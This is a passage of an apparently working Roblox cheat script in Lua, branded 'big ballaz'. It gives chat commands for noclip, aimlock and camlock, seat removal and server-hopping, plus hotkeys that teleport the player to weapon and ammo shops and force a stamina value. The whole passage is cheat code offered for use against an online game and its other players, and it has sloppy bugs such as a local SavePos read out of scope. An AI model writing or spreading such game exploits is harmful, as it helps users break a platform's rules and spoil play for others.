		end
		Notify("big ballaz", "Aimvelocity: " .. tonumber(Args[1]), "", 3)
	end
}
Commands["| nc, noclip, nclip -|- Toggles Noclip |"] = {
	["Aliases"] = {"noclip", "nc", "nclip"},
	["Function"] = function()
		Noclip = not Noclip
		Notify("big ballaz", "Noclip: " .. tostring(Noclip), "", 3)
	end
}
Commands["| bs, blinkspeed -|- Sets Blinkspeed |"] = {
	["Aliases"] = {"bs", "blinkspeed"},
	["Function"] = function(Args)
		if Args[1] then
			Blinkspeed = tonumber(Args[1])
		end
		Notify("big ballaz", "Blinkspeed: " .. tonumber(Args[1]), "", 3)
	end
}


Commands["| aimpart -|- SELECTS AIMPART |"] = {
	["Aliases"] = {"aimpart"},
	["Function"] = function(Args)
		AimPart = Args[1]
		if AimPartTable[Args[1]] then
			AimPart = AimPartTable[Args[1]]
		end
		Notify("big ballaz", "AimPart: " .. tostring(AimPart), "", 3)
	end
}
Commands["| rc/removechair -|- REMOVES CHAIRS |"] = {
	["Aliases"] = {"removechair", "rc"},
	["Function"] = function()
		local workspaceChildren = workspace:GetDescendants()
		for i = 1, #workspaceChildren do
			local Child = workspaceChildren[i]
			if string.find(Child.ClassName:lower(), "seat") then
				Child.Parent = CoreGui
			end
		end
	end
}

Commands["| Serverhopper -|- SERVERHOPS |"] = {
	["Aliases"] = {"serverhop"},
	["Function"] = function()
		local HttpService, TPService = game:GetService "HttpService", game:GetService "TeleportService"
		local OtherServers =
			HttpService:JSONDecode(
				game:HttpGet(
					"https://games.roblox.com/v1/games/" .. game.PlaceId .. "/servers/Public?sortOrder=Asc&limit=100"
				)
			).data

		function ServerHop()
			for _, v in next, OtherServers do
				if game.JobId ~= v.id then
					if v.maxPlayers ~= v.playing and v.ping < 100 then
						TPService:TeleportToPlaceInstance(game.PlaceId, v.id)
						break
					end
				end
			end
		end
		ServerHop()
	end
}
RService.Stepped:Connect(
	function()
		if
			Camlock == true and CamlockTarget and CamlockTarget.Character and
				CamlockTarget.Character:FindFirstChild(CamPart)
		then
			Camera.CoordinateFrame = CF(Camera.CoordinateFrame.p, CF(CamlockTarget.Character[CamPart].Position).p)
		end
		if Noclip == true then
			for i = 1, #Client.Character:GetChildren() do
				local CG = Client.Character:GetChildren()[i]
				if CG:IsA("BasePart") then
					CG.CanCollide = false
				end
			end
			pcall(
				function()
					if Client and Client.Backpack then
						Client.Backpack:FindFirstChild("Glock").Barrel.CanCollide = false
					else
						Client.Character:FindFirstChild("Glock").Barrel.CanCollide = false
					end
				end
			)
		end
		if Viewing == true and ViewTarget ~= nil then
			Camera.CameraSubject = ViewTarget.Character
		end
		if Flying and Client.Character then
			if Client.Character and Client.Character:FindFirstChild("Humanoid") then
				RService.Heartbeat:Wait()
				Client.Character.Humanoid.PlatformStand = false
				Client.Character.Humanoid.Sit = false
				Client.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Running)
			end
		end
		if Client.Character:FindFirstChild("FlyPart") then
			Client.Character:FindFirstChild("FlyPart").CFrame =
				Client.Character.HumanoidRootPart.CFrame * CF(0, -3.5, 0)
		end
	end
)

print([[


]])
getgenv().Night = false -- Set to "true" if you want it to be on etc.
getgenv().Day = true -- Set to "false" if you want it to be off etc.

local RService, LService = game:GetService "RunService", game:GetService "Lighting"

RService.RenderStepped:Connect(
	function()
		if LService and LService.ClockTime then
			if Night == true then
				LService.ClockTime = 3
			elseif Day == true then
				LService.ClockTime = 14
			end
		end
	end
)
Client.Chatted:Connect(RunCommand)


local Input = game:GetService('UserInputService')
local ammo = false

game:GetService('RunService').Stepped:connect(
function()
	if ammo then
		if game.Workspace:FindFirstChild("Buy Ammo | $25") then
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =
				game.Workspace["Buy Ammo | $25"].Head.CFrame
		end
	end
	game.Players.Localplayer.Backpack.ServerTraits.Stann.Value = 100
end
)


Input.InputBegan:Connect(
	function(hotkey)
		if hotkey.KeyCode == Enum.KeyCode.Q then
			if Input:GetFocusedTextBox() == nil then
				local SavePos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
				ammo = true
			end
		end
	end
)

Input.InputEnded:Connect(
	function(hotkey)
		if hotkey.KeyCode == Enum.KeyCode.Q then
			if Input:GetFocusedTextBox() == nil then
				ammo = false
				game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = SavePos
			end
		end
	end
)

local Input = game:GetService('UserInputService')
local ammo = false

game:GetService('RunService').Stepped:connect(
function()
	if ammo then
		if game.Workspace:FindFirstChild("Glock | $200") then
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =
				game.Workspace["Glock | $200"].Head.CFrame
		end
	end
	game.Players.Localplayer.Backpack.ServerTraits.Stann.Value = 100
end
)


Input.InputBegan:Connect(
	function(hotkey)
		if hotkey.KeyCode == Enum.KeyCode.B then
			if Input:GetFocusedTextBox() == nil then
				local SavePos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
				ammo = true
			end
		end
	end
)

Input.InputEnded:Connect(
	function(hotkey)
		if hotkey.KeyCode == Enum.KeyCode.B then
			if Input:GetFocusedTextBox() == nil then
				ammo = false
				game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = SavePos
			end
		end
	end
)

local Input = game:GetService('UserInputService')
local ammo = false

game:GetService('RunService').Stepped:connect(
function()
	if ammo then
		if game.Workspace:FindFirstChild("Uzi | $150") then
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =
				game.Workspace["Uzi | $150"].Head.CFrame
		end
	end
	game.Players.Localplayer.Backpack.ServerTraits.Stann.Value = 100
end
)


Input.InputBegan:Connect(
	function(hotkey)
		if hotkey.KeyCode == Enum.KeyCode.M then
			if Input:GetFocusedTextBox() == nil then
				local SavePos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
				ammo = true
			end
		end
	end
)

Input.InputEnded:Connect(
	function(hotkey)
		if hotkey.KeyCode == Enum.KeyCode.M then
			if Input:GetFocusedTextBox() == nil then
				ammo = false
				game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = SavePos
			end
		end
	end
)
game:GetService("Workspace").FallenPartsDestroyHeight = math.huge - math.huge
Notify("big ballaz", "Took " .. string.format("%.3f", tick() - LoadingTime) .. " seconds to load", "", 3)
	end)
end
coroutine.wrap(CSFR_fake_script)()


local YA = Instance.new("ScreenGui")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")

YA.Name = "YA"
YA.Parent = game.CoreGui
YA.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

TextLabel.Parent = YA
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0, -26, 0, 240)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.RobotoMono
TextLabel.Text = "big"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 40.000

TextLabel_2.Parent = YA
TextLabel_2.BackgroundColor3 = Color3.fromRGB(86, 0, 32)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0, 59, 0, 240)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.RobotoMono
TextLabel_2.Text = "ballaz"
TextLabel_2.TextColor3 = Color3.fromRGB(86, 0, 232)
TextLabel_2.TextSize = 40.000

TextLabel_3.Parent = YA
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0, 30, 0, 266)
TextLabel_3.Size = UDim2.new(0, 200, 0, 50)
TextLabel_3.Font = Enum.Font.RobotoMono
TextLabel_3.Text = "pietasfanboy#0001"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 20.000
